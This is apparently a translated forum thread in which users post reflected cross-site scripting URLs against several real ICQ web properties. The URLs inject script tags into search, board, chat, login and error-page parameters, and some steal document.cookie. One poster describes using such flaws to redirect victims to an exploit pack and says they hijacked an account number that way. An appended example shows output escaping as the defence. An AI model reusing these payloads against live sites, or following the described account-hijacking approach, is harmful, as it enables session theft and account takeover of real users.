Looks like I dug up some XSS
PHP:
http://people.icq.com/people/?searched=1&keyword2=&my_gender=0&match=0&age_group=&home_country_code=380&m_status=0&donline_only=on&gender=0&age_group=&home_cc=380&fname=&lname=&nickname=&uin=&home_city=&home_state=&home_cc=380&origin_city=&origin_state=&origin_cc=0&work_oc=0&work_department=&work_company=&past_code=0&past_text=&interest_code=0&interest_text=&group_code=0&group_text=&photo_flag=on&online_only=on&x=4&y=8"><script>alert(/Test%20XSS%20from%20_-[A.M.D]HiM@S-_/)</script>
IE
PHP:
http://boards.icq.com/boards/post_msg.php?topic_id=887083&reply_to=3544728&tid=696&sys_id=&return_url=%2Fboards%2Fview_messages.php%3Ftid%3D696%26topic_id%3D887083"><script>alert(/Test XSS/)</script>
PHP:
http://www.icq.com/icqchat/chatroom.php?c_id=13browse_folder.php?tid=30279%22;//--%3E%3C/%22%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E
Code:
http://people.icq.com/people/?searched=1&keyword2=&my_gender=0&match=0&age_group=&home_country_code=380&m_status=0&donline_only=on&gender=0&age_group=&home_cc=380&fname=&lname=&nickname=&uin=&home_city=&home_state=&home_cc=380&origin_city=&origin_state=&origin_cc=0&work_oc=0&work_department=&work_company=&past_code=0&past_text=&interest_code=0&interest_text=&group_code=0&group_text=&photo_flag=on"><script>alert()</script>
It wasn't hard to find! Put a script into any variable there and you get an alert!
P.S. But what's the use of passive XSS?
Here are 4 more that I just found:
PHP:
http://www.icq.com/people/?searched="><script>alert(/Dracula4ever/)</script>
PHP:
http://www.icq.com/people/?searched=1&keyword2=gf&my_gender=2&match=1&age_group=&home_country_code=972&m_status=0&gender=0&age_group=&home_cc=972&fname=&lname=&nickname=&uin=&home_city=&home_state=&home_cc=972&origin_city=&origin_state=&origin_cc=0&work_oc=0&work_department=&work_company=&past_code="><script>alert(/Dracula4ever/)</script>
PHP:
http://www.icq.com/people/?searched=1&keyword2=gf&my_gender=2&match=1&age_group=&home_country_code=972&m_status=0&gender=0&age_group=&home_cc=972&fname=&lname=&nickname=&uin=&home_city=&home_state=&home_cc=972&origin_city=&origin_state=&origin_cc=0&work_oc=0&work_department=&work_company="><script>alert(/Dracula4ever/)</script>
PHP:
http://www.icq.com/people/?searched=1&keyword2="><script>alert(/Dracula4ever/)</script>
Code:
https://www.icq.com/karma/login_page.php?icq_number=>"><script>alert('Xss-icq.com')</script>
http://forums.icq.com/forums/index.php?act=view_topic&group_id=523&topic_id=102679&forum_page=1?forum_q=>"><script>alert('Xss-icq.com')</script>
https://www.icq.com/karma/login_page.php?dest=https%3A%2F%2Fwww.icq.com%2Fregister%2Femail_attach.php&sv=20&service=20&css=whitepages?uin_email=>"><script>alert('Xss-icq.com')</script>
http://www.icq.com/people/?gender=0&match=1&age_group=&photo_flag=on&online_only=on&home_cc=41&searched=1&my_gender=2?keyword2=>"><script>alert('Xss-icq.com')</script>
Well, one more
Code:
https://labs.icq.com/compad/error.html?title=register&err=blocked_country&xtra=%3Cscript%3Ealert('xss')%3C/script%3E
There is a use: for example, palming off a redirect to an exploit pack on an American with a nice UIN :-D That's how I hijacked a number for myself (just not with this XSS).
These were found, a long time ago though.
http://forum.antichat.ru/showthread.php?p=153345#post153345
I don't know, maybe they're still alive. )))) Although very unlikely ))
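
Added example, not part of the thread and not ICQ's code: most payloads posted above begin with `">`, which fits a parameter value echoed into a double-quoted HTML attribute. The sketch assumes a hypothetical search form (function names and the choice of fields are assumptions) and renders it once by raw concatenation and once with output encoding, using two constructed query strings in the shape of the thread's payloads.

```javascript
// Added example: hypothetical search form that re-fills its inputs from the
// query string. Field names are borrowed from the URLs in the thread; the
// rendering code itself is an assumption, not the site's implementation.
const FIELDS = ["keyword2", "past_code", "work_company"];

// "Before": the decoded value is placed in the attribute unchanged.
const raw = (s) => s;

// "After": escape the characters significant in HTML text and quoted attributes.
const ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
const escapeHtml = (s) => s.replace(/[&<>"']/g, (c) => ESCAPES[c]);

// Render one <input> per field, passing each value through the chosen encoder.
function renderForm(query, encode) {
  const params = new URLSearchParams(query); // percent-decodes the values
  return FIELDS.map((name) => {
    const value = params.get(name) ?? "";
    return `<input name="${name}" value="${encode(value)}">`;
  }).join("\n");
}

// Regression check: a <script> element in the output means the value
// escaped its attribute and became markup.
function hasInjectedScript(html) {
  return /<script\b/i.test(html);
}

// Constructed inputs: one literal payload, one percent-encoded.
const SAMPLES = [
  'searched=1&keyword2="><script>alert(/Test XSS/)</script>',
  "searched=1&past_code=%22%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E",
];

// Compare both renderings for every sample.
function runDemo() {
  return SAMPLES.map((q) => ({
    vulnerable: hasInjectedScript(renderForm(q, raw)),
    hardened: hasInjectedScript(renderForm(q, escapeHtml)),
  }));
}

console.log(runDemo());
```

Because the encoder is applied per field inside `renderForm`, every reflected parameter is covered, which matters here since the thread reports the same behaviour for any variable of the search form.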